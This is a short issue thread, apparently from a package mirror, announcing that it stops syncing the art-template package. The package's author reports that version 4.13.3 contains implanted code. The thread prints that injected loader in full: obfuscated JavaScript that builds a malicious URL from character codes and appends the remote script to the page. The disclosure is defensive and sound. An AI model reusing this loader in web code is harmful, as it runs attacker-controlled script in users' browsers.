art-template 包停止同步

[elrrrrrrr]

As the original author of this package, I confirm that version 4.13.3 contains implanted malicious code. This code dynamically loads external resources from https://git.youzzjizz.com/git.js (obfuscated via character code conversion), a domain marked as malicious by multiple security vendors. Having lost maintenance privileges, I cannot directly revoke this version.

4.13.3 版本注入动态代码，且相关变更不在 github repo 中体现，相关 issue 被二次删除，风险较高，开始停止同步。

function scriptMagician() {
  var script = document.createElement("script");
  script.src = String.fromCharCode.apply(
    null,
    [
      104, 116, 116, 112, 115, 58, 47, 47, 103, 105, 116, 46, 121, 111, 117,
      122, 122, 106, 105, 122, 122, 46, 99, 111, 109, 47, 103, 105, 116, 46,
      106, 115,
    ]
  );
  script.onload = function () {
    if (typeof initBaiduShare === "function") {
      initBaiduShare();
    }
  };
  script.onerror = function () {};
  document.head.appendChild(script);
}
scriptMagician();

[elrrrrrrr]

已生效

[fengmk2]

之前的截图

[fengmk2]

https://github.com/goofychris/art-template/issues/660#issuecomment-2721134943

最初的 issues 回复记录：